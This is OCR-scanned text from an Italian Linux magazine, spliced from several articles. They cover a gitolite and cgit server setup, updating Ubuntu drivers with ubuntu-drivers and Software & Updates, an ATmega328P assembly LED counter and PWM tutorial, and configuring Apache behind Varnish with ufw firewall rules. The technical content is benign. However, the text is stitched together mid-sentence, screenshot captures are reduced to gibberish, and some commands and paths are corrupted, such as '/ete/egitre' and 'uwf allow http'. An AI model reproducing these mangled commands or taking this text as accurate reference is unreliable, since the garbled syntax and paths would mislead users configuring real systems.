Git repositories hosted at kerneLorg 


Name 
pub/scrvbluetooth 


dracut - Initramfs generator using udev 


The efilinux UEFI boot loader 


UN SISTEMA DISTRIBUITO 


Un concetto fondamentale da capire è che git non prevede un 
modello centralizzato: non esistono dei veri e propri server, tutto 
viene distribuito. Il programma git funziona su qualsiasi mac- 
china sia come client che come server. Ad esempio, possiamo 
creare un repository git con git init && git add * sul computer 
192.168.1.68. Poi possiamo andare sul PC 192.168.1.100 e clonare 
il repository con git clone nomeutente@192.168.1.68:nomedelrep 
ository.git. Possiamo fare delle modifiche e salvarle con git com- 
mit. Inviamole poi con git push, ma possiamo anche aprire un 
terminale sul computer 192.168.1.68 e lanciare git clone nomeut 
ente@192.168.1.100:nomedelrepository.git. Il fatto che alcuni PC 
vengano usati sempre come server e altri sempre come client è 
solo una convenzione che si usa per comodità, ma di fatto questa 
distinzione non sussiste. Gitolite serve ad aiutare gli utenti a cre- 
are un “server” Git, ma non dimentichiamo che è solo una como- 
dità in più, in realtà qualsiasi PC con il programma git installato 
può funzionare sia da client che da server. 


@ 


keydir/nomeutente.pub, ricordandosi poi di eseguire il commit ogni volta 
che se ne aggiunge una. Avendo una lista di link, anche queste possono 
essere scaricate. 


sudo apt-get install cgit 

sudo a2enmod cgi 

echo “scan-path=/var/lib/gitolite/repositories” >> 
/ete/egitre 

usermod -aG gitolite http 

chmod g+rX /var/lib/gitolite 

chmod -R g+rX /var/lib/gitolite/repositories 


Infine, si può installare cgit e si devono correggere i permessi di accesso ai file 
dei repository, altrimenti cgit non sarà autorizzato a leggerli. Da notare che, per 
evitare problemi di permessi in futuro si può impostare l’UMASK a 0027 nel 
file /var/lib/gitolite/.gitolite.re. 


Unnamed repository: edit this file ‘description’ to name the repository. 


Kernel.org keysign map source 

Kernel.org website source 

Unux man pages Sections 2, 3,4, 5, and 7 
Website files for /doc'man-pages 


Micro-emacs 


Ex12/3/4 filesystem userspaoe utilities 


® Fig. 1 © IL codice del kernel Linux è tra i tanti progetti gestiti da git e presentati tramite l'interfaccia web di cgit 
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na delle cose che preoccupa principalmente gli utenti che 
vorrebbero avvicinarsi a GNU/Linux provenendo da Windows 
è la mancanza di driver per i propri dispositivi. In verità, 
però, questa preoccupazione non ha ragione di esistere, proprio perché 
tale “problema” è ormai risolto da diversi anni. Praticamente tutti i 
principali dispositivi in commercio dispongono anche di driver che li 
rendono funzionanti anche sul sistema operativo del Pinguino. Anzi, 
molti driver sono integrati direttamente nelle più note distribuzioni. A 
causa del loro design, i driver per kernel Linux pesano meno di quelli 


vincosentu 


L'utility è già installata in 

Ubuntu. Dunque, avviamo il 
terminale e iniziamo a usarla. Lanciamo 
il comando ubuntu-drivers devices per 
visualizzare un elenco di tutti i driver 
disponibili per il sistema in uso (ovvia- 
mente, dipende dall'hardware presente). 
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sosentux@vincosenturi = 


installati 


A questo punto, lanciamo il co- 
mando sudo ubuntu-drivers autoinstall per 
procedere al setup di tutti i driver segnalati 
al passo precedente: il download e l'instal- 
lazione di tutto il necessario viene effettua- 
ta automaticamente da ubuntu-drivers. 


DRIVER 
ESOFTWARE 
SEMPRE 
AGGIORNATI 


La guida passo passo per tenere la tua release di Ubuntu 
sempre aggiornata: non solo i programmi ma anche 
i driver dei tuoi dispositivi 


per Microsoft Windows e ciò permette agli sviluppatori di integrare 
tonnellate di driver direttamente nell'OS (o meglio, nel kernel). Al tempo 
stesso, però, esistono alcuni driver non sono disponibili out-of-the-box, 
perché sono proprietari, molto pesanti o comunque validi per un ridotto 
numero di dispositivi. Un esempio? I driver ufficiali di NVIDIA, il noto 
produttore di schede video. In questi casi procurarseli può essere un po' 
più complicato, perché bisogna cercarli sul Web, scaricarli e installarli 
manualmente. Per fortuna in Ubuntu esiste un software, ubuntu-drivers, 
che automatizza il tutto. Ecco come usarlo. 


vincosentux@vincosentux: = 
le Aiuto 


nf.d/x86_64-linux-gnu_EGL.conf (xB86_64:linux-g! 


one del trigge: 
ate-inltram 


0an0000bc83scoGi00 
o non-free 


deRoNOROGbcEBsCEOLOG 


Ragoginon- free 


Una nota importante: quan- 

do lanciamo ubuntu-drivers' 
devices, l'utility ci segnala non solo i driver 
Open Source e Liberi disponibili per un pre- 
ciso dispositivo collegato al nostro PC, ma 
anche quelli proprietari. Questi ultimi sono 
individuabili grazie al testo “non-free”. 


L'update è automatico! 


Scegliamo quali software installare nel sistema e quali aggiornare 


Softyare per Ubuntu Altro software Aggiornamenti Autenticazione Driver aggiuntivi Opzioni di sviluppo i 


pont 


 InnoTekSystemberatung GmbH: VirtualBox Graphics Adapter 
Questo dispositivo stà usando un driver alternativo. 
© inuso x86virtualizationsolution-X11 guestutilities da virtualbox-guest-x11 (proprietario) 
Nonusare il dispositivo 


RAT 


&ì !nnoTek Systemberatung GmbH: VirtualBox Guest Service 
Questo dispositivo sta usando un driver alternativo. 
@ inuso x86virtualization solution» quest addition module source for dkms da virtualbox-guest-dkms {| 
Nonusareil dispositivo . 
fi Sconosciuto: Sconosciuto 


2dciver proprietari inuso. 
Mo.diivec prroriatacia porseota del cadice orata che gi lrapat ridi motu pon oasoon tte 


TU SÌ, TU NO! 
01 Dalle Impostazioni di sistema spostiamoci in Sof- 
tware e aggiornamenti. Da qui, spostiamoci nel tab 
Driver aggiuntivi. Dopo qualche secondo appare l'elenco di tutti 
i driver che sono stati installati. Se non vogliamo più utilizzarne 
uno proprietario, possiamo scegliere Non usare il dispositivo. 


Applità modifiche d 
p Ai 


CEVA di 


Software per Ubuntu | Altro software | Aggiornamenti Autenticazione Driveraggiuntivi Opzioni di sviluppo 


Partnerdiì Cano 


Partner di Canonical (Codice sorgente} 
Software distribuito da Canonical peri loro partner 


© http://archive.ubuntu.com/ubuntu main universe restricted multiverse 
http://archive.ubuntu.com/ubuntu main universe restricted multiverse (codice sorgente) 


modiche -. 


Chiodi, 


VT RONEZIOIGANT DV: POTERE TI I ASTIILE MTA ENTE N Ferma 


I REPOSITORY 
03 Sempre da Software e aggiornamenti possiamo 
aggiungere i repository di un particolare software. 
Spostandoci infatti nel tab Altro software, possiamo verificare 
quali repository sono attualmente abilitati nel sistema (nel 
caso in figura, universe, restricted e multiverse di Ubuntu). 


Software per Ubuntu | Altro software Aggiornamenti Autenticazione Driveraggiuntivi Opzioni disviluppo | 


Scaricabile da Internet î 
{2 Suppoîtato da Canonical, softuarelibero e open source (main) CESTI È 
1 Mantenuto dalla comunità, software libero e open source (universe) 
© Oriver proprietari peri dispositivi (restricted) 

{2 Software conrestrizioni per copyright.o motivi legali (multiverse) È 
Codice sorgente î 


Scaricare da: | Server personalizzati ” 


Installabile da CO-ROM/DVO È 
CD-ROM con Ubuntu 17.10 «Artfut Aardvark» i 


Supportati ufficialmente 
Copyright con restrizioni 


EP Pineta : om 


QUALE SOFTWARE? 
0 Spostiamoci ora nel tab Software per Ubuntu. 
Verifichiamo che siano abilitate le opzioni 
Supportato da Canonical, Mantenuto dalla comunità, Driver 
proprietari per i dispositivi e Software con restrizioni per 
copyright o motivi legali. Terminiamo con Chiudi. 


Software per Ubuntu Altro software Aggiornamenti | Autenticazione Driver aggiuntivi Opzioni di sviluppo 
installare aggiornamenti da: 
19 Aggiornamenti di sicurezza importanti (artfulsecurity) 
© Aggiornamenti raccomandati (artfulupdates) 
© Aggiornamenti non supportati (artful-backports) 


Verificare aggiornamenti automaticamente: | Ogni giorno 


Quando ci sono aggiornamenti di sicurezza: | Scarica e installa automaticamente 


Quando d-sono altri aggiornamenti: | Visualizza ogni settimana 


vtrms tranne denata" o in fr arerstniptthee errare x 397 mPmITO meo mi 


QUALI UPDATE? 
02 Spostiamoci ora nel tab Aggiornamenti (sempre 
presente in Software e aggiornamenti). Abilitiamo le 
opzioni Aggiornamenti di sicurezza importanti, Aggiornamenti 
raccomandati e Aggiornamenti non supportati. Indichiamo an- 
che ogni quanto verificare la presenza di update. 


Inserire la riga APT completa del repository da aggiungere come 
sorgente 


La siga APTinclude il tipo, la posizione e i componenti di un repository, per 
esempio «deb htto;//orchive.ubuntu.com/ubuntu artful main». 


Riga APP { 


LE RIGHE APT 
04 Se vogliamo aggiungerne un nuovo repository, ba- 
sta cliccare sul pulsante Aggiungi (presente nel tab 
Altro software) e compilare il campo Riga APT con l'indirizzo 
del repository. Confermiamo con un clic su Aggiungi sorgente 
e il nuovo repository apparirà in elenco. 


Sono disponibili aggiornamenti software per questo 
computer. Installarli ora? 


® 


» Dettagli degli aggiornamenti 


ia Gli aggiornamenti sono già stati scaricati. 


Impostazioni...) Ricorda inseguito { installa ora 


ECCO GLI UPDATE! 
06 Non appena verranno rilasciati degli update, una 
finestra di sistema ci notificherà la presenza degli 
stessi. Non dobbiamo far altro che cliccare su Installa ora e 
attendere che il sistema e i software venga aggiornati. Non 
c'è niente di più semplice! 


1soo 
sens 
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E tempo di Arduino 


Addentriamoci nello sviluppo Assembly per i microcontrollori a 8 bit, 
realizzando contatori e timer. Ecco come fare 


eto lo trovi su: www.edmaster.it/url/7391 


Il codice compl 


% Assembly è un linguaggio subito sopra il 
livello macchina che permette di accedere e/o 
controllare il funzionamento di una macchina 

fino ai suoi registri utilizzando particolari istruzioni 
mnemoniche che svolgono operazioni varie, come copiare 
i dati in un registro o manipolarne i valori. Tali istruzioni 
vengono tradotte in codice esadecimale dall’assemblatore 
per poi essere copiate nella memoria del microcontrollore 
(uC) previo uso di un caricatore al fine di poter essere 
eseguite dopo essere state tradotte dal uC. 


LE MEMORIE 


Nel precedente numero di Linux Magazine abbiamo 
iniziato a scoprire alcune istruzioni Assembly, focalizzando 
l’attenzione sul uC ATmega328P, quello usato da Arduino. 
Poiché siamo in presenza di un’architettura Harvard 
(l’architettura dei nostri PC è la Von Neumann), allora 
abbiamo due memorie distinte: una per il programma e una 
per i dati (senso attenzione a non confondere le varie sigle 
che possiamo incontrare). 

Nell’architettura Von Neumann il blocco di memoria e il 
relativo bus sono unici, pertanto dati e istruzioni vengono 
letti dalla CPU utilizzando lo stesso bus: risultato? Non è 
possibile leggere allo stesso tempo un dato e un’istruzione. 
Nell’architettura Harvard quanto riferito è invece possibile 
poiché vi sono due bus dedicati che permettono l’accesso 
in modo indipendente a dati e istruzioni immagazzinate in 
memorie differenti. Si guardi, ad esempio, il diagramma a 
blocchi (figura 4.1 pag. 13) del datasheet allegato (www. 
edmaster.it/url/7391). Detto ciò, con EEPROM (Electrically 
Erasable Programmable Read-Only Memory) si indica 
il modo ovvero la tecnologia utilizzata per immagazzinare 
le informazioni, un tipo di memoria scrivibile e cancellabile 
elettricamente utilizzata per memorizzare dati non volatili 
e/o modificabili durante l’esecuzione di un programma 
o contenente parametri iniziali per il pC. La Flash è la 
memoria che mantiene, anche in assenza della tensione 
di alimentazione, il programma che il uC dovrà eseguire. 
Infine la SRAM (Static RAM) è quella parte di memoria 
atta a contenere registri, dati e Stack. 

La Fig. 1 riporta in alto la struttura delle 3 memorie 
poc’anzi definite con i relativi indirizzi. Per la SRAM le 
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Memoria Flash 
0x0000 


SRAM 


0x08FF— 
RAMEND 


Ox3FFF 


Esempio dinamica dello stack 


Stack Pointer 


Stack dopo istruzione POP 


@ Fig. 1 e Organizzazione della memoria, in basso la dinamica 
dello stack 


prime 32 locazioni da 8 bit sono riservate ai registri da R0 
a R31, indirizzi da 0x00 a 0x1F. Nelle locazioni successive 
da 0x20 a 0x5S9 vi sono registri specifici, riservati e non. 
Ad esempio all’indirizzo 0x20 troviamo EEPROM Data 
Register, all’indirizzo 0x21 EEPROM Address Register 
Low all’indirizzo 0x22 EEPROM Address Register High 
a cui fanno seguito tutti i registri elencati al paragràfo 35 
(pag. 428) del datasheet e tra questi abbiamo i registri di 
I/O (Input/Output) mappati in memoria che controllano 
direttamente lo stato dei pin del uC: cambiando un bit in 
tali registri, direttamente o in funzione delle istruzioni di un 
programma, si va a cambiare lo stato corrispondente a quel 


determinato pin. Osserviamo come esistano ulteriori 160 
registri per funzionalità estese, almeno tra i modelli di uC 
che le supportano: il registro TCCRIA, che utilizzeremo nel 
nostro progetto, è tra questi poiché ha un offset di 0x80 (128 
in decimale). 


COS’E LO STACK 

L’ultima parte della SRAM (2048 locazioni da 8 bit 
ognuna) può essere impiegata per memorizzare dati 
temporanei e per la creazione dello Stack. Quest’ultimo 
è concettualmente un blocco consecutivo di memoria 
allocato al fine di poter immagazzinare ‘dati temporanei 
frutto, ad esempio, di risultati di determinate istruzioni 
o di specifiche scelte del programmatore. La struttura 
dello Stack è di tipo LIFO (Last In First Out), il primo 
elemento ad essere memorizzato sarà anche il primo ad 
uscire (Fig. 1, in basso). 

Può essere paragonato ad una pila di piatti: i nuovi piatti 
vanno sempre in cima e ogni volta che un piatto viene 
tolto ciò avviene sempre dalla cima: l’ultimo elemento 
entrato (last in) è il primo a uscire (first out). Lo Stack è 
opportunamente indirizzato da un registro che prende il 
nome di Stack Pointer che punta alla sommità dello stack 
ed è costituito dallo Stack Pointer Register Low byte 
da 8 bit (paragrafo 11.5.2, pag. 31) e dallo Stack Pointer 
Register High byte da 3 bit, in totale 11 bit con i quali si 
possono indirizzare tutte le 2048 locazioni della SRAM 
(2111=2048). 

Lo stack è gestito dalle due istruzioni PUSH che deposita 
i contenuti di un registro e POP che effettua l’operazione 
contraria. L'uso dello Stack è praticamente indispensabile 
in quei programmi che utilizzano subroutine e interrupt. 


UN PRIMO PROGETTO 


Dopo qualche richiamo e alcune precisazioni passiamo al 
primo progetto da sviluppare. Un computer non conosce i 
numeri ma funziona in base a degli stati logici: allo stato 
logico basso “0” corrispondono 0 V e allo stato logico alto 
“1”, 5 V (0 3,3 V o altri valori a seconda della famiglia di 
integrati e della tensione di alimentazione). 

Ipotizziamo il uC alimentato a 5 V quindi tale sarà il 
livello logico alto. Un sistema di numerazione decimale 
è caratterizzato da 10 cifre, da 0 a 9 ed è il tipico sistema 
utilizzato dagli esseri umani. Per i computer la situazione 
cambia: essendo due i livelli logici non si può che 
utilizzare la numerazione binaria che prevede due valori: 0 
e 1. Ogni elemento di tale numerazione è 1 bit, l'insieme di 
8 bit determinano il byte. Va da sé che con 1 bit possiamo 
rappresentare, nel corrispettivo decimale, al più due 
valori: 0 e 1. Con 2 bit al più 4 valori (da 0 a 3) e così via 
a seguire. In Fig. 2 è ripoîtata una tipica conversione da 
binario a decimale. Poiché siamo in presenza di sistemi 
posizionali allora la posizione della cifra determina il peso 
nel sistema di numerazione che si sta usando. 

Così il bit 0 (LSB - Least Significant Bit) ha peso 1 (240), 
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il bit 1 ha peso 2 (21) e così via fino al bit 7 (MSB - Most 
Significant Bit) di peso 128 (2/7). Detto ciò, se usiamo 
per questa prima prova il registro PORTC (Port C Data 
Register) del uC notiamo (dal datasheet al paragrafo 18.4.5 
pag. 119) come esso sia caratterizzato da 7 bit, numerati da 
0 a 6. Questo vuol dire che possono essere conteggiati al 
massimo 128 valori, da 0 a 127, dopodiché il registro va in 
overflow e inizia a contare di nuovo da 0. Poiché il nostro 
obiettivo è aumentare gradualmente la complessità degli 
esempi in Assembly, allora il progetto sarà realizzare un 
contatore che visualizzi tramite LED un numero decimale 
in formato binario: quando il LED è acceso il valore è il 
corrispondente peso in decimale. 

Analizziamo il base del programma 
rimandandovi al sorgente completo nel quale sono presenti tutti 
i commenti del caso. 


funzionamento di 


ldi temp, 0x7F 

out DDRC, temp 

ldi count, 0x00 sè 
loop: 

out PORTC, count 

inc count 

rjmp ‘loop 


Tutte le istruzioni utilizzate sono riportate al paragrafo 36 (pag. 
432) del datasheet nonché nel documento, sempre in allegato, 
atmel-0856-avr-instruction-set-manual.pdf. La prima istruzione 
Idi carica il valore 0x7F (127 in decimale) nel registro temp. 
I registri DDRx configurano alcuni pin del uC.: se il valore è 
1 il pin corrispondente verrà impostato come uscita. Allora 
attraverso l’istruzione out i pin 23, 24, 25, 26, 27, 28 e 1 del 
uC verranno configurati come uscite. Alla successiva riga con 


1 Byte = 8 Bit 


Bit | Bit | Bit | Bit | Bit | Bit | Bit | Bit 
7 6 5 Di 3 2 (ARE 


7 6 5 4 3 2 1 
2:2:2+2+2+ 2*+ 2 
128 +.0 + .32 + 16 + 0 + 4 + 2 


Esempi per contatore a 7 bit 


® Fig. 2 * Corrispondenza tra numerazione binaria e decimale 
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& Fig. 3 è Cablaggio del contatore binario: utilizzabile anche una Arduino Uno 


l’istruzione Idi caricheremo il valore 0 nel registro count. Si entra 
quindi nell’etichetta loop e la prima istruzione vede l'impostazione 
del registro PORTC al valore della variabile count. I registri 
PORTx poiché mappano l’I/O ne definiscono lo stato di uscita dei 
pin correlati. Poiché count è 0 tutte le uscite mappate si porteranno 
al livello logico basso (LED spenti). La successiva istruzione inc 
incrementerà di 1 il valore di count che pertanto si porterà a 1 (in 
binario 0000001) a cui fa seguito l'istruzione rjmp che farà ripetere 
la sezione loop. A questo punto il nuovo valore di count verrà 
associato a PORTC che pertanto farà illuminare il LED collegato al 
pin 23: è stato contato un impulso. 

Di nuovo inc incrementerà di 1 unità il valore del registro count 
che si porterà al valore 0000010 (2 in decimale) che assegnato al 
registro PORTC farà spegnere il LED del pin 23 e accendere quello 
del pin 24. Alla successiva iterazione, count sarà pari a 0000011 (3 
in decimale) e pertanto si accenderanno i LED collegati ai pin 23 e 
24 e così via a seguire fino a 127 quando tutti i led saranno accesi 
per poi ricominciare da 0. 

Il sorgente riportato non è completo poiché mancante di altre parti 
tra le quali il ritardo minimo indispensabile per rendere intellegibile 
il conteggio. Se non vi fosse alcun ritardo in quanto tempo si 
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esaurirebbe il conteggio? Entrati nell’etichetta loop l’istruzione 
out prende 1 ciclo così come inc mentre 2 cicli li prende rjmp per 
un totale di 4 cicli per ogni iterazione della sezione loop. Poiché 
127 sono le iterazioni allora si avranno 508 cicli. Ipotizzando 
che il sistema viaggi ad una frequenza di 16 MHz per ogni ciclo 
sono necessari 62,5ns quindi per esaurire un conteggio il uC 
impiegherebbe 508 cicli * 62,5ns= 31,75ps, con l’effetto id vedere 
i LED sempre accesi. Per coloro che volessero utilizzare un puC 
stand-alone possono cablare il circuito di Fig. 3 aiutandosi con il 
file Contatore.fzz in allegato (da aprire con il programma Fritzing 
- htip://fritzing.org). A questo punto, scarichiamo l’assemblatore 
avra (http://avra.sourceforge.net/) e, dopo aver decompresso il 
file avra-1.3.0-linux-i386-static.tar.bz2, copiamo nella cartella 
avra-1.3.0-linux-i386-static il file contatore.asm allegato. Nella 
medesima cartella apriamo un terminale e lanciamo il comando avra 
contatore.asm, quindi carichiamo il file .hex corrispondente con: 


avrdude -v -p m328p -c arduino -P /dev/ttyUSB0 -b 


115200 -D -U flash:w:contatore.hex:i 


Verifichiamo, aiutandoci conil comando dmesg o l’IDE Arduino, 


il punto di “aggancio” in /dev della scheda che potrebbe anche 
essere /dev/ttyACMO. 


INCLUSIONE DI FILE 


Ricordiaîno che una direttiva assembler è un messaggio rivolto 
all’assemblatore: lo informa sul come vadano eseguiti i processi di 
assemblaggio. Direttive già incontrate nonché usate negli esempi in 
questo numero, sono .device che definisce il modello di yC che si 
vuole utilizzare e quindi il set di istruzioni ammesso, .eseg specifica 
all’assemblatore che l’intero programma dovrà essere contenuto nella 
flash memory, .0rg specifica da dove dovrà iniziare il programma 
ovvero da quale indirizzo dovrà assemblare il programma che in un 
secondo momento dovrà essere caricato dal loader nelle locazioni di 
memoria e infine .equ che assegna un valore a un'etichetta. 

Nei sorgenti fin qui esaminati abbiamo sempre riportato con la direttiva 
EQU il nome del registro seguito dall’indirizzo dello stesso. Esistono, 
però, dei file creati ad-hoc che riportano tutte le caratteristiche del uC. 
Tali file sono identificati con nome_file.inc. Se andiamo nella cartella 
include dell’assemblatore avra precedentemente decompresso, ne 
troveremo diversi ognuno dei quali corrisponde ad un ben preciso 
pC: in essi vengono mappati tutti i registri presenti in quel particolare 
modello. È possibile dire all’assemblatore di leggere in uno specifico 
file prima dell’assemblaggio e per tale funzione è utilizzata la direttiva 
include nome_file laddove il file da includere può essere un file .inc 
(u4C che si vuole utilizzare) e/o file .asm. Poiché per il uyC in uso non 
è presente alcun file .ine in avra allora in allegato è presente il file 
m328Pdef.inc da unire ai nostri progetti in Assembly. 


CONTATORI E PRESCALER 


Ogni componente elettronico funziona su una base dei tempi che aiuta 
a mantenere sincronizzate tutte le operazioni e i uC, che funzionano 


Valore medio della tensione: ===» 
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® Fig. 4 © Principio per variare la luminosità di un LED 
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con una frequenza di clock definita, non fanno eccezione. La famiglia 
AVR vanta timer precisi e affidabili tramite i quali è possibile pensare 
diverse funzioni applicative. Fondamentalmente un timer è un registro 
il cui valore incrementa o decrementa in maniera del tutto autonoma. 
Nell’ ATmega328P vi sono tre timer/contatori: due a 8 bit - in grado di 
contare 256 impulsi, da 0 a-255 - indicati con TC0 e TC2, e uno a 16 
bit (TCI1, conta da 0 a 65.535) il cui valore cambia a ogni impulso di 
clock (capitoli 19, 20, 21 e 22 nel datasheet). Una volta che un timer 
ha raggiunto il massimo valore va in overflow. Il timer è indipendente 
dalla CPU, funziona parallelamente alla CPU e non c’è un suo 
intervento ma può influenzarla a seconda delle applicazioni. Associati 
a questi timer/contatori abbiamo un prescaler, un “oggetto” che 
divide la frequenza in valori più piccoli e poiché il periodo è l'inverso 
della frequenza ciò comporta tempi maggiori nell’incremento del 
conteggio. Ad esempio a 16MHz un conteggio a 16 bit lo esauriamo 
in (1/16.000.000)*65.535=4,1ms circa. ‘Il fattore di divisione del 
prescaler è funzione di come venga programmato con l’apposito 
registro CLKPR, (Clock Prescaler Register, paragrafo 13.12.2 
pagina 60). Impostando il fattore a 16, la frequenza di 16MHz verrà 
divisa per 16 quindi il conteggio non avanzerà più alla frequenza di 
16MHz (periodo di 62,5ns) bensì a 1MHz (periodo 1pts) il che significa 
che il timer/contatore a 16 bit va in overflow dopo 1us*65535=65,5ms 
circa. Non si pensi, però, di poter utilizzare il prescaler liberamente, 
c’è un compromesso tra risoluzione e durata temporale: a 16MHz la 
risoluzione è 62,5ns, applicando il prescaler con divisione per 16 la 
risoluzione temporale si porta a lus. Da marcare che tutto ciò non 
influisce sulla velocità di esecuzione delle istruzioni che rimane 
invariata, ma solo sulla velocità di aggiornamento dei contatori. 


UN TIMER 


AI di là dell’usuale conteggio, un timer può essere utilizzato 
per due specifiche modalità di funzionamento: Clear Timer 
on Compare (CTC) e Pulse 
Width Modulation (PWM) o 
modulazione della larghezza 
degli impulsi. In questo secondo 
progetto applicheremo il 
principio della PWM (Fig. 4) 
per aumentare gradatamente 
la luminosità di un LED fino 
alla massima possibile per poi 
ridurla di nuovo a zero. 

Per il cablaggio facciamo 
riferimento al file allegato 
Ledfading.fzz e all'omonimo 
file .asm da dare in pasto 
all’assemblatore e nel quale 
vi sono tutti i commenti utili a 
comprendere passo dopo passo il 
funzionamento e del programma 
così come dei singoli bit di 
interesse all’interno dei registri 
coinvolti. In caso di difficoltà 
possiamo rivolgerci al al forum 
di Linux Magazine (Aftp://linux- 
magazine.edmaster.it/forum/). 
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i suoi esordi, qualsiasi sito Web riceve un 

traffico pressoché irrisorio ma, se curato 

r bene (nei contenuti, nel caso di un 

blog o nella qualità e nei prezzi dei prodotti offerti, 
nel caso di un e-commerce) alla lunga può generare 
un traffico realmente consistente. Pensiamo 
ad esempio ai Big del Web: pensiamo davvero 
che Amazon.com nelle sue prime settimana di 
vita abbia generato il traffico che è in grado di 
generare oggi? E lo stesso vale per Facebook, 
Wikipedia o qualsiasi altro sito Web che tutti noi 
visitiamo quotidianamente. Ma, quando il traffico 
sale, un web server irrimediabilmente si pianta. 
Specialmente se utilizziamo il solo Apache, senza 
accoppiarlo magari a Nginx. Cosa fare dunque per 


TUO SITO 
EB METTE 


IL TURBO! 


Varnish è la soluzione ideale per i siti Web 
che generano molto traffico. Ecco come installarlo 
e configurarlo anche sul tuo server 


prepararci ad una fortunata escalation del numero 
dei visitatori del nostro sito Web? Molti penseranno 
ad aumentare le risorse hardware della macchina, 
ma questa soluzione non è la più conveniente. Il più 
delle volte, infatti, basta affidarsi a Varnish, il server 
proxy più amato dai sistemisti che si ritrovano a 
gestire siti Web ad alto traffico. Tanto per capirci, 
i nomi che abbiamo fatto poco fa (Facebook, 
Wikipedia e tanti altri) utilizzano proprio Varnish 
per migliorare le prestazioni dei loro server. Di fatto, 
si tratta di un acceleratore di richieste HTTP che si 
occupa di effettuare il caching delle richieste che 
arrivano ad un web server: se contemporaneamente 
migliaia di utenti cercano di accedere tutti verso lo 
stesso sito Web, Varnish entra in azione. 


SETUP DI VARNISH 


Ma come installare e configurare Varnish? 
Contrariamente a quanto si possa pensare, è solo 
una questione di minuti. Nelle pagine seguenti 
scopriremo come installarlo correttamente 
su un web server equipaggiato con Apache e 
basato su Ubuntu (ma la procedura è identica 
per la maggior parte delle distribuzioni in 
circolazione). Configureremo Varnish di modo 
come un reverse proxy per Apache: quest'ultimo 
verrà eseguito sulla porta 8080, mentre la 
classica 80 verrà utilizzata proprio da Varnish. 
Cos'altro aspettiamo? Rimbocchiamoci subito 
le maniche e spremiamo al massimo il nostro 


web server! 


Ma dove vai se Apache non ce l'hai? 


Per utilizzare Varnish è ovviamente necessario disporre di un web server 


Avviamo il terminale e da qui lanciamo il comando sudo 

apt-get update. Al termine dell'aggiornamento della li- 
sta dei pacchetti, lanciamo sudo apt-get install -y apache2 e atten- 
diamo la fine del setup (che dura al più un paio di minuti). 
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Al termine dell'installazione, avviamo Apache e abilitia- 

molo per l'avvio automatico ogniqualvolta il sistema vie- 
ne riavviato. Per fare ciò, lanciamo dapprima il comando systemctl 
start apache2 e successivamente systemctl enable apache2. 


service -+/1ib/systend/systen/apac 
treated synlink feti temd/s ‘wants/apach heclean.service > /lib/ 
tochectean.service 
Elaborazione del tr 


azione del trigger per 
lgger. pet 


iv 
Comando "systend" 
Conando "systema* 


ieS systenctl. enable ‘apache? 
rvice, wlth'SysV service script with )lib/systend/systend instati, 
sysvinstall enable apathe2 
art apachez 
iynchronizing state af apache2.sèrvice with SysV service script with /1ib/systend/systend-sysv-instalt 
systend/systend:sysv-Install enable apache? 


1-$ Ufw allow ssh 


ecessarto essere root pe Uesto script 


Regole aggi 


tegole aggiornate (v6) 
SABA: Es sud 


È arrivato il momento di stabilire delle regole per 

il firewall (in Ubuntu UFW) per consentire l'acces- 
so al web server. Da terminale, lanciamo il comando sudo 
ufw allow ssh seguito da sudo uwf allow http e da sudo ufw al- 
low https. Infine, lanciamo sudo ufw enable. 


Ubuntugiubuntu: fete/apachez! 
File \ Moulticà Visualizza: Cerca Terininale. Aiuto 
GNU nano 2.8.6 


ports. conf Modificato 


‘Madule 551 module> 
Listen 443 
[e /afhoduli 


[<Ifmodule modionutls.c> 
Lister 443 
l</1fModule> 


, {0 Da terminale, digitiamo cd /etc/apache2, confer- 

miamo con Invio e modifichiamo il file ports.conf 

presente in questa directory [sudo nano ports.conf). Cambia- 

mo la porta predefinita 80 con 8080 (riga 5 del file). Salviamo 
con Ctrl+0 e usciamo dall'editor nano con Ctrl+X. 


‘ubunti@ubuntu /ete/spachez 

file: Modifica Visualizza Cerca) Terminale: Alto 

sensible-editor seteifsac. setsid 

sensible-pager set-daté-epoch setterm 
electdetault-rspell n) setfacl setupcon 
lect-defautt:iwrap rivice setfont 
elect:default-wordilst  sesston-migration setkeycodes 
elect-editor setleds 

5/89/8080/9* ‘ports:conf 


setxkbman 


#ì, carattere 2: ci sono altri caratteri dopo LI comando 
ipached$ sed »Ì ve ‘s/80/8889/0' ports.conf 
inpossibile aprire AL file temporaneo ./ 1 Permesso negato 
ibontu@ubunti: hezS: sudo; sedi +1 ‘ports .conf 
ibuntugub ichez$: sudo sed -i ce g' sitescavallable/* 
bbuntugub 
H0esz6: Syntax ercor on line 5 of /etc/apache2/ports. 
nvalid address ‘ar port 
ction "configtest' falle 
he Apache ‘error log me more information, 
untu: fete/apachess apachectl configt 
error on line 5 of /etc/apache2/ports conf: 
or port 
1 fatled. 
che error log may have more information. 
tus/etc/apached$ sudo apachect confiotest 
Syntax error on line 5 of /etc/apache2/ports 


s i) Verifichiamo di aver apportato tutti i cambiamen- 

ti dei passi precedenti senza commettere errori: 

lanciamo da terminale il comando sudo apachectl configtest 

e, se tutto è andato liscio, non ci resta che riavviare il web 
server con sudo systemctl restart apache2. 


‘ubunti@ubuntu: = 


ti, Le infornazi non prò 
ha, avere privile 


 Codalnv Indirtzzo locale 270 reneto Stato 
C) 0. n. 0.8, 0:% LISTEN, 
6 127,0.0. x; 


FID/Pregram nane 


cecooces 


cea 


ugobu: 
lonnessioni Internet attiv 
Pato Codahie Codalnv. In Indirizzo renoto tato 
0.0,6.0;* LISTEN 
d.ar* STEN 

Ù: LISTEN 
LISTEN 

LISTEN 


4 Setutto è andato per il verso giusto, le porte pre- 

definite per l'accesso HTTP, HTTPS e SSH risul- 

tano ora aperte. Per verificarlo, possiamo affidarci al tool 

netstat: lanciamo da terminale sudo netstat -plIntu e analiz- 
ziamo l'output per verificare che i servizi siano accessibili. 


Ubuntugsubuntu; /etcapachez, 
le (Modifica Visuali rca Terminale Aluto 
Q.0.0,0;* 
B.0.0/0:* 
9.8.0,0:* 


pache2/ 


sudo. nano ports.conf 


abb 
setarch 


telfsacì 


tafapach 
leareti-path 

led 

pe 


Modifichiamo la porta {da 80 a 8080) anche per 

tutti i virtual host presenti nella directory sites- 
available. Per fare ciò digitiamo semplicemente da terminale 
il comando sed -i -e 's/80/8080/g' sites-available/* e confer- 
miamo con Invio. 


Ubintugubuntu: Aetc/pachez 
ile Modifica Visualizza | Cer inale Aiuto 
[foto codaric cod: a ì e n 0 rena Stato 
o LISTEN 
LISTEN 
LISTEN 


P1D/Progr 


tpt with /14b/ 


LISTEN 
LISTEN 


LESTEN 


18fe)} Facendo nuovamente affidamento al tool Netstat 
